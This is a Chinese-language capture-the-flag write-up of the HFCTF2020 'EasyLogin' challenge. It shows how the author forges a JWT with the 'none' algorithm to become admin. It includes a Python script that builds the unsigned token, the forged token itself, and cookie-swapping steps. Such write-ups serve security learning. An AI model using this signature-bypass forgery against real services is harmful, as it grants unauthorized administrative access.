[HFCTF2020]EasyLogin

[HFCTF2020]EasyLogin

打开题目便是登录界面,先进行注册

登录成功,发现提示讲flag就在这里,这里有输入框,输入flag,点击GET FLAG

返回权限被拒绝

查看源代码但是没有发现什么,但是抓登录的数据包时发现了jwt,所以这应该是通过修改jwt中的权限信息来获得admin权限

将其放到https://www.jwt.io/中查看,jwt信息格式:前两部分均是base64加密,第三部分加密方式为第一部分声明的加密算法结合密匙进行加密

然后就想着获取密匙,但是未成功,在网上看到:当加密时使用的是 none 方法,验证时只要密钥处为 undefined 或者空之类的,即便后面的算法指名为 HS256,验证也还是按照 none 来验证通过,那这样的话我们就可以直接伪造jwt的信息了,对header和payload部分信息分别进行修改和加密,然后拼接加密后的字符串(注意删掉填充符=),结果如下:

复制代码
import base64
import json


def base64_url_encode(data):
    b64_encoded = base64.b64encode(data.encode('utf-8')).decode('utf-8')
    return b64_encoded.rstrip('=').replace('+', '-').replace('/', '_')
header = {
        "alg": "none",
        "typ": "JWT"
    }
payload = {
        "secretid": [],
        "username": "admin",
        "password": "123456",
        "iat": 1773737892,
        "role": "super_admin"
    }
encoded_header = base64_url_encode(json.dumps(header, separators=(',', ':')))
encoded_payload = base64_url_encode(json.dumps(payload, separators=(',', ':')))

print("Base64URL编码后的Header(无填充符=):")
print(encoded_header)
print("\nBase64URL编码后的Payload(无填充符=):")
print(encoded_payload)

最终的JWT为:

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTc3MzczNzg5Miwicm9sZSI6InN1cGVyX2FkbWluIn0.

用新生成的JWT来替换掉原来的JWT,然后讲username改为admin(当时做的时候就忘记改了,发现返回的是false,浪费了一些时间)

admin登录成功后,查询flag,然后抓包

将查询处抓包的cookie值换成登录包中的cookie值,发送就可以获得flag了

相关推荐
FreeBuf_16 小时前
14000余台F5 BIG-IP暴露,高危RCE漏洞正遭活跃利用
tcp/ip·安全·web安全
Xudde.16 小时前
班级作业笔记报告0x08
笔记·学习·安全·web安全
Xudde.19 小时前
班级作业笔记报告0x09
笔记·学习·安全·web安全·php
CHICX122919 小时前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全
m0_7381207219 小时前
渗透基础知识ctfshow——Web应用安全与防护(第二章)
服务器·前端·安全·web安全·php
鹅天帝19 小时前
20260407网安学习日志——序列化漏洞
前端·学习·web安全·网络安全·xss
爱思考的发菜_汽车网络信息安全19 小时前
汽车网络安全:ECC算法详细解析
安全·web安全·汽车
运维行者_19 小时前
MSP网络管理破局者:IPAM+SPM插件终结IP冲突与安全威胁
运维·服务器·开发语言·网络·安全·web安全·php
买大橘子也用券19 小时前
第一届 Polaris CTF 招新赛(部分web) wp
web安全·网络安全
李豆豆喵19 小时前
008-基础入门-不回显不出网&演示环境&源码项目等
web安全